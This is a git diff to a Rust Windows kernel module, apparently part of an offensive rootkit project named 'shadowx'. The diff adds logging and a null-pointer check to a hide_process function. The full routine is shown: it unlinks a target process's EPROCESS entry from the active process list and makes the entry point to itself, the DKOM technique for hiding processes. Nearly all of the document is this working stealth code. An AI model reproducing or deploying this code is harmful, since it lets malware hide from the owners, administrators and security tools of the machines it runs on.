diff --git a/shadowx/src/process.rs b/shadowx/src/process.rs index 0a744ac..fb0b363 100644 --- a/shadowx/src/process.rs +++ b/shadowx/src/process.rs @@ -103,42 +103,71 @@ impl Process { /// in the list before it was modified. /// * `Err(ShadowError)` - Returns an error if the process lookup fails or the operation encounters an issue. pub unsafe fn hide_process(pid: usize) -> Result { + // Log the start of the process hiding routine. + log::info!("Attempting to hide process with PID: {}", pid); + // Getting offsets based on the Windows build number let active_process_link = get_active_process_link_offset(); let offset_lock = get_process_lock(); // Retrieve the EPROCESS structure for the target process let process = Self::new(pid)?; + log::info!("Found EPROCESS for PID {} at address: {:p}", pid, process.e_process); - // Retrieve the `LIST_ENTRY` for the active process link, which connects the process - // to the list of active processes in the system. + // Retrieve the `LIST_ENTRY` for the active process link. let current = process.e_process.cast::().offset(active_process_link) as PLIST_ENTRY; - let push_lock = process.e_process.cast::().offset(offset_lock) as *mut u64; + log::info!("Current LIST_ENTRY pointer: {:p}", current); - // Use synchronization to ensure thread safety while modifying the list + // Retrieve the push lock for synchronization. + let push_lock = process.e_process.cast::().offset(offset_lock) as *mut u64; + log::info!("Using push lock at: {:p}", push_lock); + + // Use synchronization to ensure thread safety while modifying the list. with_push_lock_exclusive(push_lock, || { + log::info!("Acquired exclusive push lock for process hiding"); + // The next process in the chain let next = (*current).Flink; - // The previous process in the chain let previous = (*current).Blink; - + + log::info!( + "Before unlink: current->Flink = {:p}, current->Blink = {:p}", + (*current).Flink, (*current).Blink + ); + log::info!("Neighboring entries: next = {:p}, previous = {:p}", next, previous); + + // Check if the neighboring pointers are valid before proceeding + if next.is_null() || previous.is_null() { + log::error!("One or both of the neighboring pointers are null. Aborting unlink operation."); + return Err(ShadowError::InvalidListEntry); + } + // Storing the previous list entry, which will be returned let previous_link = LIST_ENTRY { Flink: next as *mut LIST_ENTRY, Blink: previous as *mut LIST_ENTRY, }; - + // Unlink the process from the active list (*next).Blink = previous; (*previous).Flink = next; - + log::info!("Unlinked process from active process list"); + // Make the current list entry point to itself to hide the process (*current).Flink = current; (*current).Blink = current; - + log::info!("Process LIST_ENTRY modified to point to itself"); + + // Log final state of the current entry + log::info!( + "Final state of current LIST_ENTRY: Flink = {:p}, Blink = {:p}", + (*current).Flink, (*current).Blink + ); + Ok(previous_link) }) + } /// Unhides a process by restoring it to the active process list in the operating system.